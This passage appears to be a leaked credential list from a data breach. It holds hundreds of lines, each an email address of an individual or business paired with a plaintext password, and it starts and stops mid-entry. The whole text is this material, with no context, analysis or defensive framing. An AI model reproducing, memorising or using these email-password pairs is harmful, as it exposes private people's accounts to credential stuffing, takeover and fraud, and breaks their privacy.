hoo.com:daddygirl2\neg_turtle_08@bellsouth.net:lovelies08\neditor@conciergemedicinetoday.com:bravo511\necarey2012@yahoo.com:newcatty08\neiramnna76@hotmail.com:jemzigsam\nedcbell@yahoo.com:angiecake\nel.bel@comcast.net:eltonfan\neditor@scotzine.com:ecosse78\nelco1150@link.net:elco7777777\nellendasch@hotmail.com:Babie2003\nelisabrew@hotmail.com:fantasyfootball\nelizabeth_marco@yahoo.com:fister01\nelsukipoveda@hotmail.com:lopegaxiola\nelise-eve@hotmail.com:nosredna\nellard_megan@yahoo.com:lijygrdwa1\nellierosewatkins@hotmail.com:friends1\nelliemay.11@hotmail.co.uk:1996perrett\nellenh08@hotmail.com:hemroid2\nelmerbarbosa@hotmail.com:lacaraes\nedrina1996@aol.com:dewberry20\nelaa3799@rocketmail.com:34363436\neld0c1l_lep0n3@hotmail.com:mario2005\nedith_furlong@hotmail.com:sanguine22\nemily.hickman_09@live.co.uk:congratulations\nemilyadelstein@yahoo.com:oozft6e4\nemma_lee@live.co.uk:leasalonga\nelysiaparker@hotmail.co.uk:chelsea1\nemo0608@yahoo.com:06081984\nephraimsackey@yahoo.com:sackey1980\nemma_hanby@yahoo.com:rockin12\nemz-22-88@hotmail.com:myohouse38\neric.dickinson@live.com:robotwars\nemilijao@yahoo.co.uk:mamatete\nemmey-bemey@live.com.au:sammi4life\neppantelidis@hotmail.com:eusebios\nerin10oprea@yahoo.com:bellababy3\nerick.wolf@cox.net:lag96una\nEmbracus@comcast.net:summerville68\nerdem.omer@hotmail.com:evinamin\nemily@sheanypark.com.au:sheanyboy\nericcworth@msn.com:kyra1000\nerica.99@hotmail.co.uk:rodrigues8\nerinna_oconnell@yahoo.co.uk:kirwan16\nervasan81@hotmail.com:malena2008\nerianda@yahoo.com:bailey2002\neric_miller_55@hotmail.com:strength\neulemail@gmx.net:erdferkel\nessamabdelhady@hotmail.com:41424142\nerlynaquamarine20@yahoo.com:rayer020\nesimpson11@msn.com:emmaemmaemma\nespentp@hotmail.com:svalbard\nethankastner@ymail.com:vietnams\nenio.lb@terra.com.br:,.1937,.\nerrorcode13@hotmail.com:hellocode\netmekoe@hotmail.com:olifandt\nestelo81@hotmail.com:3405luis\nescartinni@hotmail.com:esthercica\nexellentellie@hotmail.co.uk:rockchick\nemsavicki@cox.net:lunacy47\nevyboley@yahoo.com:davidgeo03\nenahawk@yahoo.com:turtle777\nemmy_collins@hotmail.com:collins99\neuphrasiak@yahoo.com:victoria15\nesraramell@yahoo.com:gmcenvoy\nesterabimm@yahoo.com:88608681\nevelynqubti@yahoo.com:Violla301093\nestar96@live.com:bratzgirlz\nevelyne.magescas46@orange.fr:07gaujacq\nfaith929@hotmail.com:zztop4807\nevil-kisses@hotmail.com:captainoats\nevahuegar@hotmail.com:wever4ever\neyad@thecasateam.com:es450473\nemily_queliz@hotmail.com:dolphin23\nfabangel_fggirl@yahoo.com:anime827\newheeler35@comcast.net:poolpass\nfalconer_5@hotmail.co.uk:spawn4415\nfahmiabdelkarim@hotmail.com:houbou\nfabnkq@yahoo.com:babyface123\nfamil_luna@yahoo.com:17102700\nfareedullahkhan@hotmail.com:20041960\nemily.clegg@hotmail.co.uk:charlie4\nfefelamour@hotmail.com:elliealbie\nfasm@netcabo.pt:579027\nezraboo822@hotmail.com:naruto10\nfallahx@hotmail.com:fallah67\nfearthemelon@yahoo.com:trollet23\nfebu@ish.de:virgo2711\nfatimakhamas@hotmail.com:ihateschool\nfausto_one1@hotmail.com:marioneta\nfashionqueen62562@yahoo.com:aries625\nericleenilson@yahoo.com:anewhouse76\nferociousfelion@hotmail.com:315242529\nferalcat@lovingtheferalsoul.com:tzh40xxx\nFatriRexhepi@hotmail.com:900204\nestupidamasasocial@hotmail.com:faramir13\nfixer95@comcast.net:pocoloco\nfida100@hotmail.com:noemi100\nfiorelita_larala@hotmail.com:nirvana67\nfirenpistons@yahoo.com:1kristina\nfionafrance@hotmail.com:dexter17\nemmcurrie@yahoo.co.uk:merlin1a\nFiamaj@verizon.net:stepmom1\nflickkyah@bigpond.com:super613\neon6@hotmail.com:internet2\nflordagron@hotmail.com:31718926\nfernando.rock@hotmail.com:frules\nfouad_elkhoury@hotmail.com:foudy343\nfloralba0412@hotmail.com:flor23554140\nfabiolaanatorrez@yahoo.com:mayras042000\nfidelidad1@msn.com:rosaazul12\nfionalydon@hotmail.com:mnamnamna\nfilonube@hotmail.com:5eteplol\nfrankcturner@yahoo.com:genesius\nfreddie.priml@hotmail.co.uk:2468fouad\nfoxy9193@yahoo.com:Nicole08\nfelicitycourage@hotmail.com:minerva1\nfraginfo@orange.fr:fraginfo2677\nFlapwaggler@btinternet.com:bumflaps1\nflores.andrew@hotmail.com:nhra0587\nfragou@civil.auth.gr:1098soxos\nflylikearaven108@yahoo.com:mayfairy108\nfreek4christ@yahoo.com:skillet1\nfotsymi@yahoo.gr:luminosa57\nfriveraramirez76@hotmail.com:64646464\nfreezeemee@msn.com:lerendus\nfrank@discclonersplus.com:may101959\nfuefib@hotmail.com:ukoc7e9s\nfpesesse@yahoo.fr:Kamicha1\nfxar@hotmail.com:kalimera\ngabbi_202@yahoo.co.uk:pawprints\nfjs101@btinternet.com:3littlebirds\nforbiden5@yahoo.co.uk:symphonia\ngabriel.oconnell@btinternet.com:triumph8\nfryan12058@yahoo.com:froggygirl\nfrenchcoral@hotmail.com:lexarlexar\nFtw441@aol.com:1967757tnhjc\ng_ll_999@hotmail.com:shannonc\nflowergirlck97@comcast.net:12snowflakes\nfrkpamela@msn.com:aromaster\nfunky-shannon@hotmail.co.uk:beamish1\ng.p.martin@riseup.net:gpm12453\ng3ralh@yahoo.es:frikilink\nfroggy4@earthlink.net:isvelvet3\ng_yoder@mac.com:greg1241\ng.williams97@yahoo.com:97francis\nfriction45@yahoo.com:sohail\ngb123go@hotmail.com:kokopolo\ngasmith99@live.co.uk:tortoises\ngabby230@hotmail.co.uk:cherrydrop1\ngallopingfire89@aol.com:barbaro02\ngatoazul650@hotmail.com:carolinita\nfiona94525@hotmail.com:iamfiona\ngabriel2222@aol.com:japanese1\ngarytremolada@optusnet.com.au:97098768\ngbackr@yahoo.com:23yasmin11\ngallobill@free.fr:kanapete\ngb@webfirms.net:highway\ngarry@clipner.com:tcoln39\ngenama666@aol.com:bradbo0205\ngeneral_kane_nash@hotmail.com:madlax18\ngemma_a-leauge@hotmail.com:penultimate\nghaniafrose@hotmail.com:9849425887\ngaganpal_2007@yahoo.co.in:717114\ngemini.vixen@ymail.com:fiestygal2\ngianieciel@yahoo.com:09084481075\ngeorge_gibbons@hotmail.co.uk:dudley678\ngillhdsinclair@talktalk.net:Teal2002\ngeorgemclay@rocketmail.com:hammy123\ngi_nrok@hotmail.com:zaraguaza\ngiansoldati.gabriele@asmn.re.it:abciximab\ngiselewatson@yahoo.co.uk:zippy123\nged@qos-it.com:gideon12\ngeorgia.parker@hotmail.co.uk:ch0c0late\ngenesis_b_rodriguez@hotmail.com:Ytng5prrs\ngitsat1@hotmail.com:112484y89133z\ngiggles_me_rosa@yahoo.com:giggles1\nGiffelkrichel@hotmail.com:13792846\ngirlinthepurpleglasses@live.co.uk:darkmagic123\ngeraldita89@hotmail.com:gerygery48\ngingerspecs@hotmail.co.uk:ginger123\nglenn.clifford@btinternet.com:darrenno1\ngeorgina.evans20@hotmail.com:claire95\ngkrishnaraj@hotmail.com:rajesh75\ngirls_football@hotmail.co.uk:ilovesomeone\ngerardo@amechazurra.com:keltia\ngill_annie@yahoo.co.uk:titania7711zpw\nfruitcake1234@hotmail.co.uk:diddy9354\ngarielbaptiste12@hotmail.com:angelann16\nginajerez1201@hotmail.com:123cynthia123\ngillian.troubat@tpg.com.au:guilou2905\nglcat@yahoo.com:snowball76\nGinaGallagher@verizon.net:c0rahalliday\nghbrock@hotmail.com:Aerie819\nglambertrox@yahoo.com:kirkpatrick\nglenda2455@hotmail.com:goth4life\ngmorales19@hotmail.com:egroo837\ngiorikas82@hotmail.gr:anthimou\nglimmershimmer51@aol.com:ilovegrayson123\nglennaweller@hotmail.com:keeperofhope\ngldead3741@optonline.net:duncandog\ngothic-goddess@hotmail.com:pandamoon\ngordon.curnow@bigpond.com:siw3w003\ngonzathesecond@hotmail.com:duncan212\ngoalie_girl_17@yahoo.com:nosebleed\ngothica-gcgal@hotmail.com:iloveeyou\ngndy01986@hotmail.co.uk:GreenDayrock\ngibby.love@yahoo.com:sanchez01\ngloria.stutsman@yahoo.com:roberta1154\ngreg4dfc@hotmail.co.uk:gregdfc2k7\ngosiapszczolka@op.pl:wroclaw1\nflowerchild96@comcast.net:alexis96\nglennjackson@nl.rogers.com:bell206b\ngothic_hoosier@yahoo.com:Dottie04\ngracie@ltillman.net:gtillman96\ngrosetti@san.rr.com:gigigigi\ngrandmasgirl55@comcast.net:buddy1234\ngorgeouscaitlin@hotmail.co.uk:Jasper98\ngordo2b@hotmail.co.uk:assface11\ngstrapapetti@yahoo.fr:thekiller\ngreenbonnie2001@yahoo.co.uk:trikwaker\nGORAZOS@YAHOO.COM:janelley1\nghidini@free.fr:vd97xk\ngt.marcal@hotmail.com:feelingclothing\ngoumas21@hotmail.com:nofear21\nguedez_jesus@hotmail.com:1982758932\ngreg@worldhiphopmarket.com:oldskool1\nguy.taylor79@yahoo.co.uk:gmm747579\nglamgrewal@hotmail.com:diamond12\ngvpmeijer@zonnet.nl:52695269\nhailey_jay@live.ca:krystal83\ngymqueenanna@yahoo.co.uk:gymqueen11\nhaitianpride922@live.com:family12\ngwendolyn46@suddenlink.net:terrica21\nhakim047@live.fr:welove10\ngreyhounder2005@fuse.net:fastdog2\nhanna.luu@hotmail.com:pokemon2\nhadipapu@ymail.com:9906117560\nhannah.larkin@hotmail.co.uk:stjohnambulance\ngymgirl84@hotmail.com:cassandra10\ngweeke@hotmail.com:April1908\nguy_sos@iinet.net.au:just7doit\nhanibug@yahoo.com:hannah2524\nhannahloveskittys@yahoo.com:rose1436\nharrymcmartin@yahoo.de:vonderschlucht\nhariwizid@hotmail.com:demontfort1\nhappyrogger@mail.ru:58915050\ngeorgie-kay@hotmail.co.uk:kay12345\nhakamiah_88@hotmail.com:mercurio\ngootarfreek@yahoo.com:volcome123\nharley95motley@yahoo.co.uk:poison95\nhawaii888@live.com:jandg888\ngsenan@hotmail.com:leicester\nhaleybaleyjlo@yahoo.com:raindrops2\nhannister01@aol.com:hannah95\nhaidercheema121@hotmail.com:haidercheema\nhawk_jazz92@yahoo.com:jazzyboo13\nhatch@wht.mmtr.or.jp:bee04814\nhatzixa@yahoo.gr:arianara\nHansio1@yahoo.com:filmmaker\nhanbear7@hotmail.com:holdenuteal\nhattymail@hotmail.com:badger25\nhelen.dilworth@btinternet.com:thirteen7\nhayleyfriedman@aol.com:machins1\nheather@heathercavalier.com:elvis007\nherbie@teamfca.com:ingodshands\nhermanmaradona@msn.com:maradona\nhbailon@hotmail.com:hectora1\nhelen101le@yahoo.com:09071998\nheinrich@hudel.com:4680haag\nherbanmusic@hotmail.com:brunomarley\nheyherington@aol.com:doinitall\nhfatemi@ucla.edu:esfahan12\nhelenanathanael@aol.com:andreas3\ngiovanniteratani@msn.com:crashoverride\nHerc_reynyr2@yahoo.com:pearlinel\nh1993smithy@yahoo.co.uk:benjiman\nhestybesty@hotmail.co.uk:pinkiegirl\nhexgrl237@aol.com:heaven237\nhelen_ogubazgi@hotmail.com:123hello\nhellokitty122@yahoo.com:strawberry122\nhellokittysmygf@yahoo.com:kittykins1\nhikarimc_16@hotmail.com:sakura16\nheylee@persona.ca:dakolton\nhillssk@yahoo.com:TheLodge69\nhibabangash@rocketmail.com:bangash1\nhbcase@att.net:dolly555\nhello_kitty_81859@hotmail.com:crystal8\ngsharp@masteranglersuniverse.com:Qwerty01\nherline99@yahoo.com:1thebitch\nhollier8@sympatico.ca:14juillet\nhorselover3345@hotmail.com:money3345\nhotchick4693@yahoo.com:dvlana14\nhealthmatters@iinet.net.au:1492roth\nhot_boy3@hotmail.com:ilovepakistan\nhesoyam_pro9@yahoo.com:nuttertools\nhopesrocks@hotmail.co.uk:bhay2004\nhot.chick_09@hotmail.com:marma123\nhjhubbard@charter.net:bassett2\nhkoutas@otenet.gr:iasonas100\nhatinm@yahoo.com:fashion09\nhotroxygirl4u@hotmail.com:comeonbabe\nheavenley18@hotmail.com:okla6552\nhk_construction@sbcglobal.net:6111018hk\nhjbsoccball@yahoo.com:egregious\nhockeyrocks@telus.net:fleury14\nheathercobb510@yahoo.com:lestat14\nhunnib0503@aol.com:burgbabe\nharperalyssa@rocketmail.com:powerade44\nhorrorshow95@aol.com:loliepop21\nhpresisniuk@telus.net:Bear2799\nhostile-1988@o2.pl:26031988\nhmody419-ayn@hotmail.com:as5921\nhsarti@hotmail.com:06793751\nheatherbarton11@hotmail.com:moonlight123\nhyea_min@yahoo.com:jollyranchers\nhtrigzy@verizon.net:sharon81\nhusinclair@mac.com:rangers1\nhwsv07@yahoo.com.sg:8finzap4\nhotty911119@yahoo.com:koolkat77\nhuskykid1995@hotmail.com:jenslehmann\nhottie_ranger_101@hotmail.com:nikiesha12\nianegsmith@me.com:twickenham\nidealsky1017@yahoo.com.tw:superfun1017\nhunterheather92@aol.com:4heather\nhslall@ymail.com:harijio99\nI_lost_it_here@hotmail.com:jeni1983\nibticem5@hotmail.com:24022002i\nhrbm@internode.on.net:chainsaw\ngmwalden05@yahoo.com:kevinspacy\nhmfacial@telus.net:dana1995\nilovebear33@hotmail.com:greeny21\nilja_74@hotmail.com:3kinders\niannecho@yahoo.com:s0ybeans\nicetea4@yahoo.com:icetea65\ni.heart.choo@hotmail.co.uk:iluffhimalways\nifeklea@msn.com:lampard10\nImaginat@Imaginatweb.com:caleb3466\nidontknow94@cox.net:purple94\niayogib@yahoo.com:the7chance\nicoles@talktalk.net:donkey29\nhighthomes@yahoo.com:clydecat\nhi_rajind@yahoo.com:rajatlko1611\nihtguitm@hotmail.com:prince55\nianhowe@tiscali.co.uk:milodog54\nigallegosh@hotmail.com:Isr@2010\niloisel@yahoo.com:blueclover\nidashing23@yahoo.com:01092007\nihackedthisid@yahoo.com:z3r0h4ckz\niluvtransformers123@hotmail.co.uk:Naruto123\ninfected_razor@hotmail.com:3rfxi5de4d\nilyas55555@hotmail.fr:0688992682\nindianguy_vicky4u@yahoo.com:nishagasti\ninfo@ggnwt.com:mj5121985\niluvswedishfish@live.com:star6868\nian_hadi_saputra@yahoo.com:basing152637\ninfo@flamencotalk.com:Flamenco10\nilovebillyjoearmstrong3114@yahoo.com:gdisluv3\nimfran@live.com.au:rosie2010\ninfo@foodphone.com:daddy321\ninfo@gogettergroup.com:2getinfo\ninfernal.majesty@hotmail.com:dany2109\niluvnyc_11@hotmail.com:orlando10\ninfo@atlanticaparty.ca:partyparty\ninkisidor_maestro@hotmail.com:36027082\nioriyoshizuki15@hotmail.com:villevalo1\ni.srhoj@xtra.co.nz:paris205\ninfo@nexo.de:metaluna\nirmon2983@yahoo.com.br:27011756\nirmeli.kokko@welho.com:tellervo\ninnante@yahoo.com:copyright\niri_fun4all@yahoo.com:123bamboocha\nirenemisol@yahoo.com:50879657t\nirva2.0@earthlink.net:beauty46\nitcenter@in.com:28163366\ninfo@printwell.com.mt:castro9753\nivancemitic@live.com:buntovnik\nitsarunyar@yahoo.co.in:shavaks\niover313@yahoo.com:burninh3ll\nipyla@tee.gr:txmdetora\nisabellerouleau28@hotmail.com:7294rach\niwalker4u@hotmail.com:2469wdwl\nines_sika_1991@hotmail.com:19531966\nitz.kodi@yahoo.com:STARWARS13\nironeagleuk@hotmail.com:opus3861\nj_arbesu@hotmail.com:che-00media\nitalianbadazz93@msn.com:army33\nj_jayne723@hotmail.co.uk:Millie723\njaay86@yahoo.com:9840047057\njackieissowackie@yahoo.com:ilovedot1\nj2183356@yahoo.com.tw:a3662844\ninfo@ordoton.com:12sudden\nj222666996@yahoo.com.tw:forever96\nj.gonzalez93@hotmail.com:loquesea1\njadelevin@hotmail.com:hamster1996\njacyln_loo91@hotmail.com:jacyln1207\njackie.carmichael@hotmail.com:lexibaby\nj.hagens8@hotmail.com:Harald05\njai_alai6@hotmail.com:jaikoizun\njaishaholmes@hotmail.com:jstorm97\njackiebragg@btinternet.com:lanzarote\niv4e_manutd@hotmail.com:ivomanutd\njackie_appleby@hotmail.com:pigme123\njade12316@yahoo.com:loveme11\njaepdesignz@live.com:fresh101\nismahsyarafina@ymail.com:dafahani\njackiecronin66@yahoo.co.uk:liberty5\njadeyboots@hotmail.co.uk:curran123\nixluvxmusic123@yahoo.com:dacss123\njack.rickman@yahoo.com:stroman88\njaala_jm95@hotmail.com:maggie95\njakub@drnec.cz:22peta7\njaelynboisrond@yahoo.com:boisrond\njanicelee@hotmail.co.uk:cherry1956\njamt29@msn.com:Yamazaki29\njalapenolady45@yahoo.com:130cars\nissidore13@yahoo.com:denebadighe\nirakaz1@yahoo.co.uk:gustavus\njanine.pratt@bigpond.com:ljm3barron62\njana_hernandez@msn.com:milkyway1596\njanni29uk@yahoo.co.uk:sorry123\njazz.321@hotmail.com:jazza321\njamayne12@yahoo.co.uk:Tessa19october\njasonghostman@hotmail.com:jessicaking1972\njade_burton1@hotmail.co.uk:pwincess\njason.crowe@ipgonline.cc:eliminator\njasper.hillebrand@hccnet.nl:tristen1\njay_nil10@yahoo.com:bhumika89\njazmincortez83@yahoo.com:1lovelife\njcam1231@yahoo.com:cocolisious\njbrandon52@centurytel.net:glenda52\njaniertaylor@yahoo.com:joseph01\njbenard@hmssoftware.ca:jul*ben\njaysmom00@yahoo.com:robert68\nitstazhjayebxtch@yahoo.com:thebest@\njaydewtf@live.co.uk:hamishx1\njbcendana@yahoo.com:chiranjivi\njecs@earthlink.net:liptude\njane1309@live.co.uk:callum8903\njcrj100@bellsouth.net:rollride12\njburt@port-a-cool.com:portacool\njenine0044@yahoo.com:ningning\njdmarchilla@yahoo.es:ESTANBUL\njehad-1987@hotmail.com:skyline77\njdhua@aol.com:828334hua\njenniferlynn111595@hotmail.com:nov151995\njelie_bean19@yahoo.com:03191996\njembob_80@hotmail.co.uk:Kumagoro28\njenniferlord@live.com.au:cillian50\njess_luvs_music@hotmail.com:jeslove!!\njeanniehoward@hotmail.co.uk:mckenzie08\njessica.giberson@yahoo.com:petecat3\njeniades@hotmail.com:unamun0\njecigo2007@hotmail.com:MEHS610105\njenevapat77@yahoo.com:buddyboy11\njennifer26gregory@yahoo.co.uk:honey339\njay_plane_@hotmail.com:jayplane\njennifer1354@hotmail.com:apple616\njanie_jones91@yahoo.it:THECLA5H\njesmc24@yahoo.com:sweetmaci\njessicahanson83@hotmail.com:emmalee123\njerrymabo@hotmail.com:ilw67128\njamessheep@hotmail.com:rosscounty69\njerica333@yahoo.com:pupismelter\nJenna1.patel@btinternet.com:jenn1996\njennyynp@hotmail.com:19940423\njessy-buzzin-2k7@hotmail.co.uk:jessica2k7\nj-fleuti68@orange.fr:nicotine\njenarocks17@aol.com:breezymae\njessica.louiseX@hotmail.co.uk:flower666\njim.g1316@yahoo.co.uk:dunedin1316\njackmar58@hotmail.com:michaelj\njhonphil143@yahoo.com.ph:paramjit8\njenniferlynn1115@aim.com:nov151995\njimmystix@nycap.rr.com:stampede1112\njillchanter@msn.com:giddykip\njesus_cena@hotmail.com:sagradacena\njjdiazarochi@yahoo.com.mx:spell2005\njhawk61@hotmail.com:greenhawk\njlihancock@hotmail.co.uk:jennifer13\njlyemen@yahoo.com:jy1383msk\njim@dreamweavertv.com:oct0ber16\nJL7172@ATT.NET:LORA5672\njess.lc@hotmail.com:0801bohemianfc\njenai_t@sbcglobal.net:jenai2002\njgold2@verizon.net:j2257721\njkeel16@aol.com:bridget20\njn3b@hotmail.com:azerty\njicrw@hotmail.com:shankill\njmclaren@wightcablenorth.net:jenny1973\njladiva01@yahoo.com:momma012798\njmyboyz@aol.com:bradman1\njodie.shepherd@live.com:Ginger22\njoa.74@hotmail.com:Lolita123\njmgelx@hotmail.com:ilicitano\njoanwalko@comcast.net:athena92\njmab@batelco.com.bh:enero220\njoerumsey@ec.rr.com:a03311942\njoanne_muncic@hotmail.com:kokica87\njoannearmstrong00009@yahoo.com:jo26may1\njoekoontz@post.harvard.edu:jkpk9060\njinta_210691@hotmail.com:fzrkadn5\njoanne_chin26@hotmail.com:09041994\njmt_yee@hotmail.com:keswickk\njohn.hrycak@sympatico.ca:531106jh\njodyjay@pacbell.net:10500552\nJODYCASBARRO@MSN.COM:thankful\njoetaaffe@hotmail.com:rannafast\njockels@gmx.net:charlinka\njiminium@netzero.com:lasv9090\njomali@internode.on.net:zoepan99\njoanneparenteau@sympatico.ca:s8vb8bsnow\njhielle@yahoo.com:kayekiel\njoannekarlsson4@hotmail.com:wang0111\njocelynsaccuci@yahoo.com:Lovebugs\njohnboonstra@msn.com:seyeona1\njohnnynavarro1983@hotmail.com:silvia\njojo1258@hotmail.com:surestart1\njeraldine_zamora@yahoo.com:jhezam77\nJordi_vv@msn.com:lionheart\njoepeach56@yahoo.com:007jcp\njohnkoz9528@yahoo.gr:21112111\njojolil@hotmail.co.uk:jubjub789\njordan290288@hotmail.co.uk:gullane1\njordyn_g_93@hotmail.com:bratzgirl\njohn01one@yahoo.co.uk:Ace9901one\njohnpfernandes@hotmail.com:jsun0521\njon_lindsay@mac.com:Dseven777\njorge_boquete@hotmail.com:barbarie2006\njohntang80@hotmail.com:undercover\nJohn.Bernardi@intaglio-info.com:2twins2\njohnc@cornsilks.com:tinyttc1\njordynn21@aol.com:bigbear12\njosejuan16@hotmail.com:psilva18\njosetter@nb.sympatico.ca:5252104\njeromeberthoud@orange.fr:poulet98\njennifer_wilder@live.com:Coco-Bean\njosecampisi@hotmail.com:joancafe\njo-is@bluebottle.com:10elephants\njonathangprice@live.com:Jpri2307c5\njosh@zatland.com:15481548\njohn_mix2001@yahoo.com:ranjithrocks\njoshuagadd@hotmail.com:nerfgun202\njoseatrejos@hotmail.com:jats12345\nJracer82@aol.com:nov231982\njosylicious09@yahoo.com.mx:tampico123\njorge_a_castillo@msn.com:29101178\njrredford@btinternet.com:Snuggles1\njsfree@bellsouth.net:peenutty57\njoannamj1@yahoo.com:mysondouglas\njremparan@ilsalle.org:joserrae\njonn5335@yahoo.com:johny007\njudoman02@msn.com:er654855\njudyew46@yahoo.com:spencer5967\njones_madeleine@yahoo.com.au:laughter2\njudyjarvishome@ozemail.com.au:walhalla\njulie1303@hotmail.com:mtgore97\njulieannvg@yahoo.com:darkfairy1\njupiter_104@hotmail.com:shaz1987\njessicapacey-@hotmail.com:emendation\njulianna.battaglia@yahoo.com:bestfriends3\njuanionline@hotmail.com:fabuloso\nJULIEANNAYOGA@SBCGLOBAL.NET:peacenow\njustbeingrobyn@hotmail.com:casandra1\njully12123@hotmail.com:sshhyy920023\njustinpurdon@hotmail.co.uk:windowsXPpro\njtsbluesband@yahoo.co.uk:oldnevada1\njuan_grc@hotmail.com:ventila2\njoelydicks@hotmail.co.uk:Sparky3890\njustinmarkl@aol.com:marconi\njuliamifsud@hotmail.co.uk:01091994\njustplastering@justplastering.com.au:chachi27\nkabelomashumba@yahoo.com:ktmgrace12\njoygallen@msn.com:changes12\njuanbiedma@msn.com:peugeot405\njzmn_nv@yahoo.com:sweetcupcake\nk_soutter@hotmail.com:46zoey64\nkaeladancer@comcast.net:ba11et12\nKaitlinbdavis@embarqmail.com:josie310\njwpines@juno.com:sally1\njrichardjohnston@btinternet.com:theresa82\nk_bircham@hotmail.co.uk:katley96\nkairambling@yahoo.com:kaibaby96\nkarinek94@hotmail.fr:15061983\njuliarm@comcast.net:thomas1989\nkaraj2us@yahoo.com:1328girl\nkacey_rulez_1998@hotmail.com:mining05\nkanoscar@yahoo.com.hk:918273640440\nkabirsafi_1@yahoo.co.in:namitasafi\nkara.therrien@hotmail.com:petewentz\nkarin_vatnehol@yahoo.no:gunnhild\nkarma8003@live.com:snowgirl\njyotidekap@yahoo.co.in:kolija4680\nkaiser.jillani@live.com:jill28jan\nkarnimundhra@yahoo.com:9864515475\nkarenla62@hotmail.com:charlie1980\njmc512@zoominternet.net:082994\njust_a_girl_in_nyc@hotmail.com:backstab1\nkat609hey@live.com:katelyn6\nkarlsson.tommy@comhem.se:Gripen08\nkarap93@aol.com:kplummer1\nkarenob57@hotmail.com:herr1234\nkateske_6@hotmail.com:gnarkill\nkaloutsis16@hotmail.com:98156274\nkatya.villaviray@yahoo.com:captaincho02031988\nkate_lee1983@yahoo.com:12345678pp\nkatrinananto@yahoo.com:catdog123\nkatsillitoe@hotmail.co.uk:kitkat23\nkatee182@hotmail.co.uk:Br00me27\nkatiaus@hotmail.com:defeop12\nkawlovescookies@msn.com:moonmagic\nkarencalder86@hotmail.co.uk:tigercat22\nkaylabrewer@rocketmail.com:charming1\nkaren_antiquera@yahoo.com:051591kha\nkate@indigo.ie:lfaly789\nkatherinekober@aol.com:kober123\nKatiepanda00@hotmail.co.uk:princess66\nkathrynrose17@msn.com:tigerboy\nkboulaka@hotmail.com:samaki2002\nkaz238@hotmail.co.uk:reks130109\nkayjay914@hotmail.com:sedona01\nke_jo_ja@yahoo.com:sssghtd123\nkaycebear@yahoo.com:cheer123\nkaylakayla1231@aim.com:sexybitch456\nkaties_snakes@hotmail.com:eloise45\nkeely_rox18@hotmail.com:pumpkin18\nkayleerudd@yahoo.com:buddyboy\nkaymonster72@yahoo.com:jesse123\nkatiebears101@yahoo.com:oscar101\nkatrina329b@yahoo.com:K218199y\nkeensus@yahoo.com:dragon4life\nkayfir@aol.com:kath3r1n3\nkatiejgirl@yahoo.com:dolphins10\nkazaf_ming@hotmail.com:24241609\nkellyn_tink15@yahoo.com:princess*\nKenarf@aol.com:toggle\nkelseyprincess111@hotmail.com:SunShin1\nken@betterhomecleaning.com:bluegoose\nkbkdcfan8@yahoo.com:kabaz418\nkatherinepiano@yahoo.com:soccer93\nkalyn2008@yahoo.com:trubeauty1\nkenfLee23@tmail.com:aponte23\nkeeshawndagoodnight@yahoo.com:shawnda14\nkass@huntel.net:katm5517\nkevinstocker03@aol.com:freddie13\nkgallagher_88@yahoo.com:maddog88\nkesi66@hotmail.com:chupalos\nkhadidiacissoko@aol.com:crazylove4\nkevpollitt@hotmail.co.uk:lisa3103\nkenz_fern@hotmail.com:38766381\nkenisak@hotmail.com:karoline\nkhitchen@me.com:zeslee10\nkeyearrakhamari@yahoo.com:lolabunny1\nkezia_brewer@hotmail.com:chalahn86\nkhlariejoybautista@yahoo.com:mother56\nkevinm50@comcast.net:1armydad\nkerry18@bigpond.net.au:peanuts5\njoshh071@gmail.com:moosehead\nmas1218@gmail.com:CaSSius1218\nmaclean.tom@gmail.com:Hyper10N\nlov2killu@gmail.com:1l0vey0u\nmatin31421@gmail.com:ilsirisha\nmatto2575@gmail.com:mattoman\njkeogh71@gmail.com:toasty10\nmathsgeo@gmail.com:473iloveyou\nluv4grammie@gmail.com:grammie4luv\nmloganc@gmail.com:4948731123\nkrishna27in@gmail.com:ramgokul\nluv4lady@gmail.com:scater009\nmoe199710@gmail.com:bearlover2\nnaughtylaila@gmail.com:laila123\nnaveensourav@gmail.com:godfather\npavan4mydarling@gmail.com:ap24j1777\npaul.beauchamp@gmail.com:wendover1\npindifferent@gmail.com:jack75\nppn2max@gmail.com:socrattila\npravand@gmail.com:15399351\npraveentm2007@gmail.com:idukki137\nraanandaarthy@gmail.com:bheemaanand\nragavan.1947@gmail.com:bagalur\nrajan.rajan.rajan42@gmail.com:sundarrajan\nrajanikk19@gmail.com:asasas\nrajeshkanchi572@gmail.com:aishwarya\nrajpootkumarajeet88@gmail.com:9958844406\nrakenthr87@gmail.com:sexfriends\nramyaisstar@gmail.com:9844198441\nrash.hot@gmail.com:rash2306\nrcrajamainframe@gmail.com:18011986\nred4raj@gmail.com:9346843597\nrelayplay99@gmail.com:dreamgirl\nReneesh828@gmail.com:9947389946\nrexinshon@gmail.com:rexin123\nrockergurl313@gmail.com:bebreezy01\nrppatel666@gmail.com:panthalattil\nsagarpradhan2009@gmail.com:9776225782\nSalimsaleem786@gmail.com:203273\nsamplemailer1@gmail.com:mailergmail\nsandipdas86@gmail.com:02101973\nsandrakibandra@gmail.com:fea92ahd\nsans.ny@gmail.com:ecolika\nsarayudreams@gmail.com:sarayu123\nsaries75@gmail.com:soumen75\nsedullos86@gmail.com:Players4life\nshortmarien7@gmail.com:webkinz101\nnajeebm84@gmail.com:rahmathnisha\nplordou@gmail.com:titathe1st\nqazimdoda@gmail.com:doda0207\nrishisarank@gmail.com:9598543\nscrittore.ragazza@gmail.com:luckychance\nseema89123@gmail.com:93239752\nsekharanraja77@gmail.com:devarajan\nshilparoy1988@gmail.com:arpitanibedita\nshubam.acharjee@gmail.com:roommates\nprakhar.srivastava73@gmail.com:40504050\nrohit.fkr@gmail.com:Choose a password\nrajeshpatrodr@gmail.com:monapupun\nprg1006@gmail.com:kukshisusari\nrazaabid9@gmail.com:Ar201070\nrohitsupat1519@gmail.com:26090745\nsanjaymahaver@gmail.com:9928292347\nrockawaybill@gmail.com:clancy1706\nrajeshkarnataka@gmail.com:hassanjavagal\nsekar.bsc55@gmail.com:9790436355\nrvd.lakshmi143@gmail.com:9246644141\nsarath132009@gmail.com:9941179078\nsandeep29880@gmail.com:ninumama\npawan25patna@gmail.com:9845346661\nRahul.hydmba@gmail.com:siebelsimham\npkonline14@gmail.com:ahsanaaa\nniebla.p@gmail.com:vertebra\nr.gopi.mech15@gmail.com:gopinath060002\nrcastelo2007@gmail.com:xanie88\nnoman.ali.abbasi@gmail.com:abbasi78663\nnarayanan123400@gmail.com:kaverisingh\nrodomysl27@gmail.com:kremilek27\npratheep025@gmail.com:861462919\npete.hanratty@gmail.com:008859\npinkfawn209@gmail.com:1985live\nnarc